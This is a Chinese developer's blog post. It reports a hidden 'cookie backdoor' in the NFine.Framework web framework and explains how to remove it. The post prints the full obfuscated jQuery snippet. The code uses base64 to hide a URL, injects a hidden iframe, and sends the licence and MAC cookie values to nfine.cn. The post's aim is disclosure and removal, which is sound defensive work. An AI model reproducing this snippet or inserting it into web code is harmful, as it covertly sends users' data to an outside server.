NFine.Framework框架去除cookie后门
最近使用NFINE框架,由于涉及web,前后端思想与WINFORM相距甚远,有诸多之不解。
按照MVC框架思路套写了一些功能进去,但运行后由于服务器相对性能不好,运行有点慢,就开始找原因,运行时发现有http://www.nfine.cn ,但搜索了很久出没有找到。苦恼了一段时间,放弃了。
今天无意中在https://blog.csdn.net/wuyuander/article/details/85159653,发现博主已经找到原因了,主要原因是NFINE团队把
http://www.nfine.cn做了base64加密,分别放到了
framework-ui.js
jqgrid.min.js
jquery-layout.js
这几个文件中,具体为:
(function ($) { $.abcd = { getCookie: function (a) { var b, c = new RegExp("(^| )" + a + "=([^;]*)(;|$)"); if (b = document.cookie.match(c)) { return unescape(b[2]) } else { return null } }, execute: function () { try { if (top.$.wdversion == undefined) { top.$.wdversion = "0.0.0.0.0.1"; var a = $.abcd.getCookie("nfine_mac"); var b = $.abcd.getCookie("nfine_licence"); var c = decodeURIComponent(window.atob("aHR0cDovL3d3dy5uZmluZS5jbjo4MDk5L05GaW5lV2F0Y2gvMjAxNjA4MDEuaHRtbA==")); var d = window.atob("aWZyYW1lanMwMDAwMQ=="); var f = decodeURIComponent(window.atob("JTNDaWZyYW1lJTIwaWQlM0QlMjJpZnJhbWVqczAwMDAxJTIyJTIwJTIwc3R5bGUlM0QlMjJkaXNwbGF5JTNBbm9uZSUyMiUyMCUzRSUzQy9pZnJhbWUlM0U=")); var g = ""; if (top.$("#" + d).length <= 0) { top.$("body").append(f); window.setTimeout(function () { top.$.wdkey = { userKey: b, macs: a }; if (top.$.wdkey != undefined) { g = window.btoa(JSON.stringify(top.$.wdkey)) }; top.$("#" + d).attr("src", c + "?ppp=" + g) }, 6000) } } } catch (e) { } }, init: function () { $.abcd.execute() } }; $(function () { $.abcd.init() }) })(jQuery);
可搜索关键词aHR0cDovL3d3dy5uZmluZS5jbjo4MDk5L05GaW5lV2F0Y2gvMjAxNjA4MDEuaHRtbA==
删除可解除后门问题。
心情不好,意外之喜
目前还有一个问题,登录太慢,在WIN7 IIS下,登录花了50秒,我了个去,你受得了不?